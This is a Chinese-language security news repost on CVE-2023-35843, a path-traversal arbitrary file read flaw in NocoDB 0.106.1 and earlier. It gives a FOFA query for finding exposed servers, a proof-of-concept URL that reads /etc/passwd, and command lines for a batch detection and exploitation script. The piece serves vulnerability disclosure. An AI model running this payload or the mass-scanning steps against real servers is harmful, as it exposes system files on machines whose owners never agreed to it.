当前位置: 首页 > news >正文

【CVE-2023-35843】NocoDB 任意文件读取漏洞

news 2025/7/3 15:01:10

一、漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二、影响范围

NocoDB<=0.106.1

三、网络空间搜索引擎搜索

fofa查询

icon_hash="-2017596142"

四、漏洞复现

poc

http://ip:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

浏览器直接访问

五、漏洞批量检测与利用

单个检测

python .\NocoDBReadfile.py -u http://ip:port

批量检测与利用

 python .\NocoDBReadfile.py -f  filename

关注微信公众号 网络安全透视镜 回复 20231008-2 获取批量检测脚本

http://www.lryc.cn/news/184462.html

相关文章:

  • 在 ubuntu 22.04 上配置界面服务器 vnc
  • 强化学习------Sarsa算法
  • [HNCTF 2022 WEEK2]easy_unser - 反序列化+wakeup绕过+目录绕过
  • FastThreadLocal 快在哪里 ?
  • ggkegg | 用这个神包玩转kegg数据库吧!~(一)
  • 【小黑送书—第三期】>>《深入浅出SSD》
  • linux虚拟机查看防火墙状态
  • Docker 安装 MongoDB
  • c++解压压缩包文件
  • MySql学习笔记:MySql性能优化
  • 机器学习(四十八):粒子群优化(PSO)-提升机器学习模型准确率的秘密武器
  • MySQL - mysql服务基本操作以及基本SQL语句与函数
  • [图论]哈尔滨工业大学(哈工大 HIT)学习笔记16-22
  • 使用关键字abstract 声明抽象类-PHP8知识详解
  • Java中使用正则表达式
  • Python之字符串分割替换移除
  • ubuntu增加内存
  • 黑客都是土豪吗?真实情况是什么?
  • 企业想过等保,其中2FA双因素认证手段必不可少
  • Combination Lock
  • SpringBoot解决LocalDateTime返回数据为数组问题
  • 【数字人】2、MODA | 基于人脸关键点的语音驱动单张图数字人生成(ICCV2023)
  • 群狼调研(长沙物业第三方评优)开展房地产市场调查内容设计
  • 计算机网络-计算机网络体系结构-物理层
  • 微信小程序wxs标签 在wxml文件中编写JavaScript逻辑
  • C++设计模式-工厂模式(Factory Method)
  • 八大排序算法
  • 机器学习笔记 - 两个静态手势识别的简单示例
  • 2023年,有哪些好用的互联网项目管理软件?
  • python 按照文件大小读取文件